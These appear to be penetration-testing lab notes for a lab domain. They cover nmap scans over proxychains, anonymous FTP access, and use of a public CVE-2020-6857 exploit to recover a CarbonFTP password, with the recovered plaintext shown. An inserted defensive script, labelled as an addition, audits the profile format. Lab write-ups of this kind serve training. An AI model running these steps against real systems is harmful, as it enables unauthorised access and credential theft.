SMB
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 52.33 seconds
FTP
sudo proxychains nmap -p21 --script=ftp* 172.16.1.201 -sT -Pn
Anonymous Login allowed (For ease I did it from NIX01)
ftp anonymous@172.16.1.201
Information
- Windows_NT
- Use of PORT cmds: on
CarbonFTP Exploit # CVE-2020-6857
Caption=STRING|"Joe_IIS" Exact=INTEGER|0 ExcludeMasks=STRING|"" IncludeMasks=STRING|"." LocalFolder=STRING|"C:\inetpub" Passive=INTEGER|0 Password=STRING|"19852327402859129171335082736410993" Port=INTEGER|21 ProxyKind=INTEGER|0 ProxyPort=INTEGER|21 ProxyServer=STRING|"" RemoteFolder=STRING|"/" Server=STRING|"ftp.offshore.local" SubFilders=INTEGER|0 SyncMode=INTEGER|2 UseProxy=INTEGER|0 UserName=STRING|"joe"
Code
searchsploit -m windows/remote/48363.py
└─$ python 48363.py -p 19852327402859129171335082736410993
[+] Neowise CarbonFTP v1.4
[+] CVE-2020-6857 Insecure Proprietary Password Encryption
[+] Version 2 Exploit fixed for Python 3 compatibility
[+] Discovered and cracked by hyp3rlinx
[+] ApparitionSec
Decrypting ...
[-] 19852
[-] 32740
[-] 28591
[-] 29171
[-] 33508
[-] 27364
[-] 10993
[+] PASSWORD LENGTH: 13
[*] DECRYPTED PASSWORD: Dev0ftheyear!
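As an added example (not part of the original notes and not CarbonFTP's or the exploit author's code), the following Python parses the Key=TYPE|value profile format shown in the CarbonFTP dump above and raises the findings a defender would want from such a dump: a stored credential that is recoverable because the obfuscation is reversible, a cleartext protocol, and a sync target inside the IIS web root. It does not decrypt anything. Key names come from the dump; the parsing rules, the function names parse_profile and audit_profile, and the sample server name are assumptions.

```python
import re

# Added example: parser and hygiene check for the "Key=TYPE|value" profile
# format seen in the CarbonFTP dump above. Key names are taken from that dump;
# the parsing rules are an assumption based on its shape, not CarbonFTP docs.

# Constructed sample profile, modelled on the dump above (server name changed).
SAMPLE_PROFILE = (
    'Caption=STRING|"Joe_IIS" Exact=INTEGER|0 ExcludeMasks=STRING|"" '
    'IncludeMasks=STRING|"*" LocalFolder=STRING|"C:\\inetpub" Passive=INTEGER|0 '
    'Password=STRING|"19852327402859129171335082736410993" Port=INTEGER|21 '
    'ProxyKind=INTEGER|0 ProxyPort=INTEGER|21 ProxyServer=STRING|"" '
    'RemoteFolder=STRING|"/" Server=STRING|"ftp.example.test" SubFilders=INTEGER|0 '
    'SyncMode=INTEGER|2 UseProxy=INTEGER|0 UserName=STRING|"joe"'
)

# One entry: key, declared type, then either a double-quoted string or a bare token.
ENTRY_RE = re.compile(r'(\w+)=(STRING|INTEGER)\|("[^"]*"|[^\s"]+)')


def parse_profile(text):
    """Parse a profile dump into a dict.

    INTEGER values become int; STRING values lose their surrounding quotes
    (an empty "" becomes an empty string).
    """
    profile = {}
    for key, kind, raw in ENTRY_RE.findall(text):
        if kind == "INTEGER":
            profile[key] = int(raw)
        else:
            profile[key] = raw[1:-1]
    return profile


def audit_profile(text):
    """Return the findings a defender would raise about a profile like this one."""
    profile = parse_profile(text)
    findings = []
    if profile.get("Password"):
        # CarbonFTP's password obfuscation is reversible (CVE-2020-6857), so a
        # readable profile file is equivalent to a cleartext credential.
        findings.append(
            "stored-credential: password for user %r on %s is recoverable from the profile"
            % (profile.get("UserName"), profile.get("Server"))
        )
    if profile.get("Port") == 21:
        # The profile carries no TLS setting at all; plain FTP sends the
        # credential and the synced files in cleartext.
        findings.append("cleartext-protocol: sync runs over plain FTP on port 21")
    if profile.get("LocalFolder", "").lower().startswith("c:\\inetpub"):
        # Syncing into the web root means the FTP credential is effectively
        # write access to served content; scope and monitor it accordingly.
        findings.append("web-root-sync: profile writes into the IIS web root")
    return findings


if __name__ == "__main__":
    for finding in audit_profile(SAMPLE_PROFILE):
        print(finding)
```

Run it against any saved profile text instead of SAMPLE_PROFILE to get the same three checks; the parser tolerates empty quoted values and bare integers, which is all the dump above contains.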
3389
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: DC0
| DNS_Domain_Name: LAB.OFFSHORE.LOCAL
| DNS_Computer_Name: DC0.LAB.OFFSHORE.LOCAL
| DNS_Tree_Name: LAB.OFFSHORE.LOCAL
| Product_Version: 10.0.17763
|_ System_Time: 2023-05-01T03:58:56+00:00
| ssl-cert: Subject: commonName=DC0.LAB.OFFSHORE.LOCAL
| Not valid before: 2023-04-30T02:33:57
|_Not valid after: 2023-10-30T02:33:57
|_ssl-date: 2023-05-01T03:58:54+00:00; 0s from scanner time.